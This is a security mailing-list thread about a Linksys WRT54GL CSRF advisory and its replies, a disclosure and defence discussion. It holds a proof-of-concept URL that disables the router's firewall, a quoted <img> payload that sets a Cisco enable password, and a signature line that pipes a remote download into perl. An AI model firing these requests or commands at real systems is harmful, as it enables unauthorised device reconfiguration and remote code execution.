Mailing List Archive

Linksys WRT54 GL - Session riding (CSRF)
====================================================================================
Team Intell Security Advisory TISA2008-01
------------------------------------------------------------------------------------
Linksys WRT54 GL - Session riding (CSRF)
====================================================================================


Release date: 07.01.2008
Severity: High
Remote-Exploit: yes
Impact: Session riding
Status: Official patch not available
Software: Linksys WRT54 GL
Tested on: firmware version 4.30.9
Vendor: http://www.linksys.com/
Vendor-Status: informed on 14.08.2007
Disclosed by: Tomaz Bratusa (Team Intell)[TISA-2008-01]


Introduction
============

The Linksys Wireless-G Broadband Router is really three devices in one box. First, there's the Wireless Access Point, which lets you connect both screaming fast Wireless-G (802.11g at 54Mbps) and Wireless-B (802.11b at 11Mbps) devices to the network. There's also a built-in 4-port full-duplex 10/100 Switch to connect your wired-Ethernet devices together. Connect four PCs directly, or attach more hubs and switches to create as big a network as you need. Finally, the Router function ties it all together and lets your whole network share a high-speed cable or DSL Internet connection.


Security Risk
=============
Linksys WRT54GL is prone to an authentication-bypass vulnerability. Reportedly, the device permits changes in its configuration settings without requiring authentication (CSRF).



Technical Description
=====================
Linksys WRT54GL is prone to an authentication-bypass vulnerability. The problem presents itself when a victim user visits a specially crafted web page on an attacker-controlled site. An attacker can exploit this vulnerability to bypass authentication and modify the configuration settings of the device.

If the administrator of Linksys WRT54GL is logged into the device and opens a malicious website or email with the same browser, he is subject to attacks.
Imagine the worst case, where the administrator is constantly logged into his firewall appliance because he needs to configure changes throughout
the day. A malicious link executing unnoticed by the administrator may open the firewall.

This issue is reported to affect firmware version 4.30.9; other firmware versions may also be affected.


PoC
===
https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1&_block_multicast=0&_ident_pass=1

Following the previous link will disable the firewall on 192.168.1.1 on your LAN.


Workaround:
============
1. No official patch yet.

2. Do not surf the web when you are configuring your router.


References:
-------------------------------------------------
http://en.wikipedia.org/wiki/Cross-site_request_forgery

History/Timeline
================
14.08.2007 discovery of the vulnerability
14.08.2007 contacted the vendor
14.08.2008 Response from Cisco - They are working on it
22.10.2007 Request for status
30.10.2007 Response from Cisco - They will include the patch in the next firmware upgrade
07.01.2008 advisory is written
07.01.2008 Vulnerability is made public


---------
Contact:
---------

Maldin d.o.o.
Trzaska cesta 2
1000 Ljubljana - SI

tel: +386 (0)590 70 170
fax: +386 (0)590 70 177
gsm: +386 (0)31 816 400
web: www.teamintell.com
www.varnostne-novice.com
e-mail: info(at)teamintell.com


------------
Disclaimer:
------------

The content of this report is purely informational and meant for educational purposes only. Maldin d.o.o. shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.
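The following is an added example and is not code from the advisory or from the Linksys firmware. It models the apply.cgi handler described in the Technical Description and PoC above, and the thread's later point that the attack rides an existing admin login: vulnerable_apply() applies whatever arrives with the session cookie, while hardened_apply() rejects the same request with a method check, an Origin/Referer check and a per-session token (the token design, the cookie value and the attacker host are assumptions).

```python
# Added example, not part of the advisory: a minimal model of the router's apply.cgi
# handler, vulnerable as reported for firmware 4.30.9 and then hardened against CSRF.
import secrets
from urllib.parse import parse_qs, urlsplit

DEVICE_HOST = "192.168.1.1"      # LAN address used in the advisory's PoC
ADMIN_SESSION = "sess-admin-42"  # constructed cookie value for a logged-in administrator
# Assumed design: a per-session anti-CSRF token issued with the Firewall settings page.
CSRF_TOKENS = {ADMIN_SESSION: secrets.token_hex(16)}

# The advisory's PoC link, unchanged; the advisory says following it disables the firewall.
POC_URL = ("https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply"
           "&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0"
           "&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1"
           "&_block_multicast=0&_ident_pass=1")

def flat_params(query):
    """parse_qs() returns lists; apply.cgi semantics need one value per key."""
    return {k: v[0] for k, v in parse_qs(query).items()}

def vulnerable_apply(req):
    """Behaviour as reported: any request carrying the admin's session cookie is applied,
    no matter which site made the browser send it, and GET is as good as POST."""
    if req.get("cookie") != ADMIN_SESSION:
        return "login required"
    settings = {**flat_params(req.get("body", "")), **flat_params(urlsplit(req["url"]).query)}
    return "applied: filter=%s" % settings.get("filter")

def hardened_apply(req):
    """Same handler with three defences: configuration changes only via POST, Origin (or
    Referer) must name the device itself, and the form must carry the session's token."""
    if req.get("cookie") != ADMIN_SESSION:
        return "login required"
    if req.get("method") != "POST":
        return "rejected: GET must not change configuration"
    headers = req.get("headers", {})
    source = headers.get("Origin") or headers.get("Referer")
    # Fail closed: without Origin/Referer the request cannot prove it came from the device's UI.
    if source is None or urlsplit(source).hostname != DEVICE_HOST:
        return "rejected: cross-site request from %s" % source
    settings = flat_params(req.get("body", ""))
    token = settings.pop("csrf_token", "")
    if not secrets.compare_digest(token, CSRF_TOKENS[ADMIN_SESSION]):
        return "rejected: missing or wrong CSRF token"
    return "applied: filter=%s" % settings.get("filter")

# Constructed request 1: the PoC link fetched while viewing a third-party page; the browser
# attaches the admin's cookie and names that page as Referer.
CROSS_SITE_GET = {"method": "GET", "url": POC_URL, "cookie": ADMIN_SESSION,
                  "headers": {"Referer": "http://attacker.example/page.html"}}
# Constructed request 2: the admin submitting the device's own Firewall form.
LEGIT_POST = {"method": "POST", "url": "https://192.168.1.1/apply.cgi", "cookie": ADMIN_SESSION,
              "headers": {"Origin": "https://192.168.1.1",
                          "Referer": "https://192.168.1.1/Firewall.asp"},
              "body": "submit_button=Firewall&action=Apply&filter=on&csrf_token="
                      + CSRF_TOKENS[ADMIN_SESSION]}
# Constructed request 3: a forged POST originating from another site.
CROSS_SITE_POST = {"method": "POST", "url": "https://192.168.1.1/apply.cgi",
                   "cookie": ADMIN_SESSION, "headers": {"Origin": "http://attacker.example"},
                   "body": "submit_button=Firewall&action=Apply&filter=off"}

if __name__ == "__main__":
    for name, req in [("cross-site GET", CROSS_SITE_GET), ("legit POST", LEGIT_POST),
                      ("cross-site POST", CROSS_SITE_POST)]:
        print("%-16s vulnerable -> %s" % (name, vulnerable_apply(req)))
        print("%-16s hardened   -> %s" % (name, hardened_apply(req)))
```

None of the hardened checks depends on the administrator noticing anything in the browser, which is the point the later certificate-warning discussion turns on.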
Re: Linksys WRT54 GL - Session riding (CSRF)
Hi Tomaz,
this is not correct, you will be warned that "There is a problem with
this website's security certificate." in IE7, and you will receive a similar
warning with Mozilla 2.0.0.11.
The Router/Firewall remains running and stable as long as you don't accept
the certificate.

> If the administrator of Linksys WRT54GL is logged into the device and opens a malicious website or email with the same browser, he is subject to attacks.

He should be fired...
> Imagine the worst case, where the administrator is constantly logged into his firewall appliance because he needs to configure changes throughout

He should be fired too...

Regards,
Jan



--
Grupo Ampersand S.A.
IT-Security Consultants & Auditors
Apdo. 924 Escazu 1250
Costa Rica C.A.
Phone: (506)588-0432
ceo_at_ampersanded.com [corp.]
janheisterkamp_at_web.de [priv.]
Re: Linksys WRT54 GL - Session riding (CSRF)
Additionally, it doesn't work on Firmware V 6.0
J.


Re: Linksys WRT54 GL - Session riding (CSRF)
* tomaz bratusa:

> Linksys WRT54GL is prone to an authentication-bypass
> vulnerability. Reportedly, the device permits changes in its
> configuration settings without requiring authentication (CSRF).

This specific attack scenario has been publicly documented for a long
time (note the final paragraph):

| Isn't your exploit somewhat complicated? Just put
|
| <img src="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>
|
| on a web page, and trick the victim to visit it while he or she is
| logged into the Cisco router at 192.0.2.1 over HTTP. This has been
| dubbed "Cross-Site Request Forgery" a couple of years ago, but the
| authors of RFC 2109 were already aware of it in 1997. At that time,
| browser-side countermeasures were proposed (such as users examining
| the HTML source code *cough*), but current practice basically mandates
| that browsers transmit authentication information when following
| cross-site links.
|
| Such attacks are probably more problematic on low-end NAT routers
| whose internal address defaults to 192.168.1.1 and which generally
| offer HTTP access, which makes shotgun exploitation easier. So much
| for the "put your Windows box behind a NAT router" advice you often
| read.

<http://article.gmane.org/gmane.comp.security.bugtraq/20579>

Cisco PSIRT had been approached about this issue a couple of months
before that BUGTRAQ posting, IIRC.
RE: Linksys WRT54 GL - Session riding (CSRF)
Ok, and what does it change...there are still the same vulnerabilities in
their equipment. Should we stop checking and publishing them just because
somebody informed the vendor 2 years ago?

-----Original Message-----
From: Florian Weimer [mailto:info@plot.uz]
Sent: 11. januar 2008 11:54
To: tomaz.bratusa@teamintell.com
Cc: bugtraq@securityfocus.com
Subject: Re: Linksys WRT54 GL - Session riding (CSRF)
Re: Linksys WRT54 GL - Session riding (CSRF)
> | Isn't your exploit somewhat complicated? Just put
> |
> | <img
> src="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>
> |
> | on a web page, and trick the victim to visit it while he or she is
> | logged into the Cisco router at 192.0.2.1 over HTTP. This has been
> | dubbed "Cross-Site Request Forgery" a couple of years ago, but the
> | authors of RFC 2109 were already aware of it in 1997.


With an SWF file using PHP one wouldn't need to trick someone entirely,
just hope they don't have a pop-up blocker.


http://www.infiltrated.net/nojava.pimp

--
====================================================
J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E
Re: Linksys WRT54 GL - Session riding (CSRF)
> A malicious link executing unnoticed by the administrator may open the firewall.

The catch is that this exploit doesn't work unnoticed, because the admin
gets a notification in the browser that an error has occurred with the
certificate ["Unable to verify the identity of Linksys as a trusted
site"] and he has to explicitly allow it. In other words, first he has to
allow himself to be attacked...
Jan



Re: Linksys WRT54 GL - Session riding (CSRF)
> The catch is that this exploit doesn't work unnoticed, because the admin
> gets a notification in the browser that an error has occurred with the
> certificate ["Unable to verify the identity of Linksys as a trusted
> site"] and he has to explicitly allow it. In other words, first he has to
> allow himself to be attacked...
It's generally (although not always!) a requirement of CSRF that the
user has already logged in. So there won't be any new notification
window popping up.

It will make it harder for the attacker to stealthily attack multiple
targets without someone noticing, though.

Like Basic Authentication (which is ugly for the end-user, but browsers
can defend slightly better against attacks over it), this is one of the
cases where a little bit of user friction helps reduce attacks.

It's an open question as to whether end users pay attention to security
pop-ups at all. :)
Re: Linksys WRT54 GL - Session riding (CSRF)
On Mon, 14 Jan 2008 12:58:17 CST, Jan Heisterkamp said:
> > A malicious link executing unnoticed by the administrator may open the firewall.
>
> The catch is that this exploit doesn't work unnoticed, because the admin
> gets a notification in the browser that an error has occurred with the
> certificate ["Unable to verify the identity of Linksys as a trusted
> site"] and he has to explicitly allow it. In other words, first he has to
> allow himself to be attacked...

A very high percentage of Joe Sixpack "sysadmins" sitting at home surfing
for Nascar and pr0n will go "Yeah, whatever" and click OK anyhow. A long time
ago, I stopped thinking that "User must click OK to scary-looking message"
was any sort of road bump for malware.